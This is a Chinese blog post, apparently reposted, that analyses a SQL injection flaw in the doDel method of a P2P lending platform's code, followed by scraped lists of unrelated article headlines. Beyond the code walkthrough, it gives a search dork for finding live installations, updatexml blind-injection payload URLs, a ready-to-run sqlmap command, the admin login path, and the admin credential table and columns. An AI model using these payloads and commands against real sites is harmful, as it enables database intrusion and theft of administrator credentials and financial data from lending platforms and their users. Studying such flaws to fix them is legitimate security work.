绿麻雀网贷系统通用注入分析
在安全脉搏上面看到的这个程序,虽说已经有文章了。但是对于小菜鸟的我还是想要尝试着分析一下下。学习学习。嘻嘻。
Action
先把源码抠过来。
漏洞文件:App\Lib\Action\HCommonAction.class.php
且看漏洞产生的关键位置:
1 <?php 2 /** 3 * 以上code省略...by:DEF 4 */ 5 public function doDel(){ #首先定义了一个删除的类 6 7 $model = D($this->getActionName()); #引用getactionname 8 9 if (!empty($model)) { #如果说$model不为空执行下面的语句否则不做任何操作。 10 11 $id = $_REQUEST['idarr'];#漏洞产生地点!此处的idarr未经任何处理!就将其带入二十三行执行sql,进行删除数据,故由此引发sql注入 12 13 if (isset($id)) { 14 15 if (method_exists($this, '_doDelFilter')) { 16 17 $this->_doDelFilter($id); 18 19 } 20 21 22 23 if (false !== $model->where("id in ({$id})")->delete()) { 24 25 $this->success(L('删除成功'),'',$id); 26 27 } else { 28 29 $this->error(L('删除失败')); 30 31 } 32 33 } else { 34 35 $this->error('非法操作'); 36 37 } 38 39 } 40 41 } 42 43 ?>
因为没有任何的输出,所以对待此类猪肉只能使用盲注。凡是继承了这个HCommonAction类的都存在这个sql漏洞。
以上文件都是继承了HCommonAction类的文件。
borrow,fund,dodel下的idarr参数都是可以注入的。
PS:其实这个漏洞危害性还是有的。
inurl:member/common/register/
http://localhost/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
http://localhost/home/Feedback/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
http://localhost/home/Fund/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
可爆管理员后台:/App/Tpl/Admin/default/Index/login.html
sqlmap.py -u "https://www.xxxx.com/home/borrow/doDel/" --data "idarr=updatexml(1,if(1=1*,1,0x22),1)" --dbms=mysql --technique=B --random-agent --threads=6 --dbs
管理员默认的用户表:lzh_ausers下的user_name,user_pass,user_word
THE END
转载于:https://www.cnblogs.com/xishaonian/p/6232643.html
绿麻雀网贷系统通用注入分析相关推荐
- 第三方开发的网贷系统安全如何保障
近年来,互联网金融高速发展,据盈灿咨询发布的<2015中国网络借贷行业蓝皮书>预计在2016年,P2P网贷行业体量仍将迅速扩大,年成交量或达2万亿元,贷款余额达1.5万亿元,巨额沉淀资金和 ...
- P2P网贷系统开发公司
杭州融都商务咨询有限公司 融宝借贷 诺帮友信 五洲财富 万家兄弟 鼎峰p2p 尚贷 帝友 [厦门] 帝友和融都都在5-6万左右, 绿麻雀的3万的那个版本没有流转标,带流转标的5万,还是尚贷的实在,3万 ...
- p2p网贷系统的架构设计
p2p网贷系统,标准版已经初步完成了. 最近写点总结,也算是分享吧. 简介:p2p网贷系统,是理财类的互联网金融系统.核心功能,就是理财人用户注册,冲钱,然后投标,标到期之后,收到回款.如果不 ...
- 告别网贷系统圈钱模式,开启P2P网贷系统免费时代
在这个所谓互联网金融爆发的时代,很多传统的线下行业,都希望可以这一块肥肉上插上一脚,特别是对于贷款业务的公司,那么问题来了,如何选择一家P2P网贷系统开发商,是平台建立的第一步,也是最令大家担忧的,也 ...
- 九天鸟p2p网贷系统的架构设计
九天鸟p2p网贷系统,标准版已经初步完成了. 最近写点总结,也算是分享吧. 简介:p2p网贷系统,是理财类的互联网金融系统.核心功能,就是理财人用户注册,冲钱,然后投标,标到期之后,收 ...
- P2P网贷系统开发的软件测试
p2p网贷系统开发的软件测试工作贯穿整个项目,是p2p网贷系统生命周期中很重要的组成部分,主要工作目的是尽早发现p2p网贷平台软件存在的问题,并迅速的解决.那么p2p网贷系统开发的软件测试可以分为几类 ...
- 网贷系统架构——前端框架的选择
一.网贷系统对前端的要求 网贷,又称P2P网络借款.P2P是英文peer to peer的缩写,意即"个人对个人". 网络信贷起源于英国,随后发展到美国.德国和其他国家,其典型的模 ...
- p2p mysql 数据的拆分 案例_浅析: P2P网贷系统数据库设计
许多人对于P2P网贷系统的技术环境并不熟悉,导致不少运营商被开发商忽悠的情况屡见不鲜.今天我们就从数据库出发,给大家讲一讲有关P2P数据库技术的知识.首先,数据库架构的设计是开发一套P2P网贷系统的前 ...
- 融金所孙明达:科技金融赋能网贷系统安全
近日,融金所创始人孙明达在接受记者采访时表明:我国已经成为金融科技大国,金融科技正在扮演越来越重要的角色,融金所已经越来越重视金融科技创新.特别是在互联网众多安全问题下,科技金融能够为网贷系统安全保障 ...
最新文章
- 既然安卓是开源的 为何华为要 鸿蒙,安卓靠开源、免费赢得了天下,现在华为鸿蒙也是开源免费的! - 区块网...
- 面试必问:Spring循环依赖的三种方式
- Spring加载resource时classpath*:与classpath:的区别(转)
- python编写脚本,删除固定用户下的所有表
- 第二批鸿蒙手机排行,鸿蒙系统第二批升级机型有哪些 鸿蒙系统第二批升级机型名单一览...
- Linux系统安装MySql步骤及截屏
- 旗下首发双模5G+双挖孔全面屏!Redmi K30真机谍照曝光
- 曾遭闪电贷攻击的Origin将重新推出稳定币OUSD
- HDU 12O3 I NEED A OFFER!
- 分享:EditText默认不弹出软件键盘
- 学习 Java,使用哪个版本最好
- 动态考勤表-日期只能在某个月选时间段
- 稻城亚丁徒步攻略,与你共同感受这片净土
- 软件工程之QA管理(好软件系列二)
- [Power Query] 添加列
- 网页控制台控制视频倍速
- TCP连接,三次握手问题
- [转载].NET商业软件源码保护
- 大学本科毕业生如何免费进行论文查重
- 单位转换html代码,JavaScript实现长度单位转换
热门文章
- win服务器网络优化,还能再快一点,Win7网络优化参数详解
- Java实现邮件发送 超详细!!!(以QQ邮箱个人版和企业版为例)
- c#五子棋实验报告_C#实现五子棋游戏
- TransactionTemplate编程式事务
- 考到项目管理PMP证书后该如何获得PDU?
- 基于神经网络语言模型的中文新闻文本聚类算法
- 国开计算机上机表格试题答案,国家开放大学《计算机应用基础》考试与答案形考任务模块3模块3Excel2010电子表格系统—客观题答案...
- 加一问题中的灵光一闪
- 漂亮的女程序员找不到另一半?又想骗我当程序员
- layui input标签设置只读 不可编辑 背景灰化